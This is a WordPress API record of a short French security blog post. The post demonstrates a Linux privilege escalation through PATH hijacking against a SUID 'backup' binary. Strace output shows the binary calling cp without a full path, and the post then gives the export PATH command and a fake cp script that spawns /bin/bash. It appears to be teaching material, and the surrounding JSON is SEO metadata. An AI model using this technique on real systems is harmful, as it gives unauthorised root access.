Lorsque qu’un programme s’ex\u00e9cute avec les droits du propri\u00e9taire (SUID), il est peut \u00eatre possible de modifier le chemin d’acc\u00e8s PATH pour que celui ex\u00e9cute autre chose que ce qui \u00e9tait pr\u00e9vu au d\u00e9part<\/p>\n
\n r0cker@ubuntu:~\/secret$ ls -lsa\nls -lsa\ntotal 40\n 4 drwxrwx--- 2 r0cker r0cker 4096 Jun 27 05:29 .\n 4 drwxr-xr-x 6 r0cker r0cker 4096 Jun 27 05:30 ..\n20 -rwsr-xr-x 1 root root 16904 Nov 18 2020 backup\n<\/code><\/pre><\/p>\npar exemple, on se rend compte qu’un utilitaire SUID est vuln\u00e9rable en lisant le code source ou en utilisant l’utilitaire strace pour espionner les entr\u00e9es \/ sorties .<\/p>\n
Il est \u00e9vident que backup s’ex\u00e9cute ici avec les privil\u00e8ges de l’administrateur.<\/p>\n
en utilisant “strace backup”, on se rend compte que backup appelle cp mais sans sp\u00e9cifier le chemin complet<\/p>\n
\nmprotect(0x7f7d9dddc000, 2097152, PROT_NONE) = 0\nmmap(0x7f7d9dfdc000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1e7000) = 0x7f7d9dfdc000\nmmap(0x7f7d9dfe2000, 15072, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f7d9dfe2000\nclose(3) = 0\narch_prctl(ARCH_SET_FS, 0x7f7d9e2094c0) = 0\nmprotect(0x7f7d9dfdc000, 16384, PROT_READ) = 0\nmprotect(0x55f754c3b000, 4096, PROT_READ) = 0\nmprotect(0x7f7d9e20f000, 4096, PROT_READ) = 0\nmunmap(0x7f7d9e20a000, 19180) = 0\nsetuid(0) = -1 EPERM (Operation not permitted)\nsetgid(0) = -1 EPERM (Operation not permitted)\nrt_sigaction(SIGINT, {sa_handler=SIG_IGN, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7f7d9dc34040}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0\nrt_sigaction(SIGQUIT, {sa_handler=SIG_IGN, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7f7d9dc34040}, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=0}, 8) = 0\nrt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0\nclone(child_stack=NULL, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0x7ffc0aa81edc) = 2784\nwait4(2784, cp: cannot stat '\/home\/user\/r0cker\/myfiles\/*': No such file or directory\n[{WIFEXITED(s) && WEXITSTATUS(s) == 1}], 0, NULL) = 2784\nrt_sigaction(SIGINT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7f7d9dc34040}, NULL, 8) = 0\nrt_sigaction(SIGQUIT, {sa_handler=SIG_DFL, sa_mask=[], sa_flags=SA_RESTORER, sa_restorer=0x7f7d9dc34040}, NULL, 8) = 0\nrt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0\n--- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=2784, si_uid=1001, si_status=1, si_utime=0, si_stime=0} ---\n\n<\/code><\/pre><\/p>\non peut donc modifier le chemin d’acc\u00e8s pour qu’un r\u00e9pertoire sous notre contr\u00f4le ait la priorit\u00e9 sur les ex\u00e9cutables syst\u00e8mes<\/p>\n
\nexport PATH=\/home\/r0cker\/secret:$PATH\n<\/code><\/pre><\/p>\nPar la suite, on cr\u00e9e le script souhait\u00e9
\n
\ncat << EOF > \/home\/r0cker\/secret\/cp\n#!\/bin\/bash\n\/bin\/bash\nEOF\n<\/code><\/pre><\/p>\n","protected":false},"excerpt":{"rendered":"Lorsque qu’un programme s’ex\u00e9cute avec les droits du propri\u00e9taire (SUID), il est peut \u00eatre possible de modifier le chemin d’acc\u00e8s PATH pour que celui ex\u00e9cute autre chose que ce qui \u00e9tait pr\u00e9vu au d\u00e9part r0cker@ubuntu:~\/secret$ ls -lsa ls -lsa total 40 4 drwxrwx— 2 r0cker r0cker 4096 Jun 27 05:29 . 4 drwxr-xr-x 6 r0cker r0cker 4096 Jun 27 05:30 .. 20 -rwsr-xr-x 1 root root 16904 Nov 18 2020 backup par exemple, on se rend compte qu’un utilitaire SUID est vuln\u00e9rable en lisant le code source ou en utilisant l’utilitaire strace pour espionner les entr\u00e9es \/ sorties . Il est \u00e9vident que backup s’ex\u00e9cute <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"yoast_head":"\n
R\u00e9\u00e9criture du PATH pour obtenir davantage d'acc\u00e8s - S\u00e9curiser votre site<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.searchevolution.com\/security\/2021\/06\/26\/reecriture-du-path-pour-obtenir-davantage-dacces\/\" \/>\n<meta property=\"og:locale\" content=\"fr_CA\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"R\u00e9\u00e9criture du PATH pour obtenir davantage d'acc\u00e8s - S\u00e9curiser votre site\" \/>\n<meta property=\"og:description\" content=\"Lorsque qu’un programme s’ex\u00e9cute avec les droits du propri\u00e9taire (SUID), il est peut \u00eatre possible de modifier le chemin d’acc\u00e8s PATH pour que celui ex\u00e9cute autre chose que ce qui \u00e9tait pr\u00e9vu au d\u00e9part r0cker@ubuntu:~\/secret$ ls -lsa ls -lsa total 40 4 drwxrwx--- 2 r0cker r0cker 4096 Jun 27 05:29 . 4 drwxr-xr-x 6 r0cker r0cker 4096 Jun 27 05:30 .. 20 -rwsr-xr-x 1 root root 16904 Nov 18 2020 backup par exemple, on se rend compte qu’un utilitaire SUID est vuln\u00e9rable en lisant le code source ou en utilisant l’utilitaire strace pour espionner les entr\u00e9es \/ sorties . Il est \u00e9vident que backup s’ex\u00e9cute\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.searchevolution.com\/security\/2021\/06\/26\/reecriture-du-path-pour-obtenir-davantage-dacces\/\" \/>\n<meta property=\"og:site_name\" content=\"S\u00e9curiser votre site\" \/>\n<meta property=\"article:published_time\" content=\"2021-06-27T00:27:27+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-06-27T00:29:37+00:00\" \/>\n<meta name=\"author\" content=\"Germain\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Germain\" \/>\n\t<meta name=\"twitter:label2\" content=\"Estimation du temps de lecture\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/06\/26\/reecriture-du-path-pour-obtenir-davantage-dacces\/\",\"url\":\"https:\/\/www.searchevolution.com\/security\/2021\/06\/26\/reecriture-du-path-pour-obtenir-davantage-dacces\/\",\"name\":\"R\u00e9\u00e9criture du PATH pour obtenir davantage d'acc\u00e8s - S\u00e9curiser votre site\",\"isPartOf\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\"},\"datePublished\":\"2021-06-27T00:27:27+00:00\",\"dateModified\":\"2021-06-27T00:29:37+00:00\",\"author\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/06\/26\/reecriture-du-path-pour-obtenir-davantage-dacces\/#breadcrumb\"},\"inLanguage\":\"fr-CA\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.searchevolution.com\/security\/2021\/06\/26\/reecriture-du-path-pour-obtenir-davantage-dacces\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/06\/26\/reecriture-du-path-pour-obtenir-davantage-dacces\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.searchevolution.com\/security\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"R\u00e9\u00e9criture du PATH pour obtenir davantage d’acc\u00e8s\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\",\"url\":\"https:\/\/www.searchevolution.com\/security\/\",\"name\":\"S\u00e9curiser votre site\",\"description\":\"Conna\u00eetre son ennemi\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-CA\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\",\"name\":\"Germain\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-CA\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"caption\":\"Germain\"},\"sameAs\":[\"https:\/\/www.searchevolution.com\/security\"],\"url\":\"https:\/\/www.searchevolution.com\/security\/author\/germain\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"R\u00e9\u00e9criture du PATH pour obtenir davantage d'acc\u00e8s - S\u00e9curiser votre site","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.searchevolution.com\/security\/2021\/06\/26\/reecriture-du-path-pour-obtenir-davantage-dacces\/","og_locale":"fr_CA","og_type":"article","og_title":"R\u00e9\u00e9criture du PATH pour obtenir davantage d'acc\u00e8s - S\u00e9curiser votre site","og_description":"Lorsque qu’un programme s’ex\u00e9cute avec les droits du propri\u00e9taire (SUID), il est peut \u00eatre possible de modifier le chemin d’acc\u00e8s PATH pour que celui ex\u00e9cute autre chose que ce qui \u00e9tait pr\u00e9vu au d\u00e9part r0cker@ubuntu:~\/secret$ ls -lsa ls -lsa total 40 4 drwxrwx--- 2 r0cker r0cker 4096 Jun 27 05:29 . 4 drwxr-xr-x 6 r0cker r0cker 4096 Jun 27 05:30 .. 20 -rwsr-xr-x 1 root root 16904 Nov 18 2020 backup par exemple, on se rend compte qu’un utilitaire SUID est vuln\u00e9rable en lisant le code source ou en utilisant l’utilitaire strace pour espionner les entr\u00e9es \/ sorties . Il est \u00e9vident que backup s’ex\u00e9cute","og_url":"https:\/\/www.searchevolution.com\/security\/2021\/06\/26\/reecriture-du-path-pour-obtenir-davantage-dacces\/","og_site_name":"S\u00e9curiser votre site","article_published_time":"2021-06-27T00:27:27+00:00","article_modified_time":"2021-06-27T00:29:37+00:00","author":"Germain","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"Germain","Estimation du temps de lecture":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.searchevolution.com\/security\/2021\/06\/26\/reecriture-du-path-pour-obtenir-davantage-dacces\/","url":"https:\/\/www.searchevolution.com\/security\/2021\/06\/26\/reecriture-du-path-pour-obtenir-davantage-dacces\/","name":"R\u00e9\u00e9criture du PATH pour obtenir davantage d'acc\u00e8s - S\u00e9curiser votre site","isPartOf":{"@id":"https:\/\/www.searchevolution.com\/security\/#website"},"datePublished":"2021-06-27T00:27:27+00:00","dateModified":"2021-06-27T00:29:37+00:00","author":{"@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8"},"breadcrumb":{"@id":"https:\/\/www.searchevolution.com\/security\/2021\/06\/26\/reecriture-du-path-pour-obtenir-davantage-dacces\/#breadcrumb"},"inLanguage":"fr-CA","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.searchevolution.com\/security\/2021\/06\/26\/reecriture-du-path-pour-obtenir-davantage-dacces\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.searchevolution.com\/security\/2021\/06\/26\/reecriture-du-path-pour-obtenir-davantage-dacces\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.searchevolution.com\/security\/"},{"@type":"ListItem","position":2,"name":"R\u00e9\u00e9criture du PATH pour obtenir davantage d’acc\u00e8s"}]},{"@type":"WebSite","@id":"https:\/\/www.searchevolution.com\/security\/#website","url":"https:\/\/www.searchevolution.com\/security\/","name":"S\u00e9curiser votre site","description":"Conna\u00eetre son ennemi","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-CA"},{"@type":"Person","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8","name":"Germain","image":{"@type":"ImageObject","inLanguage":"fr-CA","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","caption":"Germain"},"sameAs":["https:\/\/www.searchevolution.com\/security"],"url":"https:\/\/www.searchevolution.com\/security\/author\/germain\/"}]}},"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/447"}],"collection":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/comments?post=447"}],"version-history":[{"count":4,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/447\/revisions"}],"predecessor-version":[{"id":451,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/447\/revisions\/451"}],"wp:attachment":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/media?parent=447"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/categories?post=447"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/tags?post=447"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}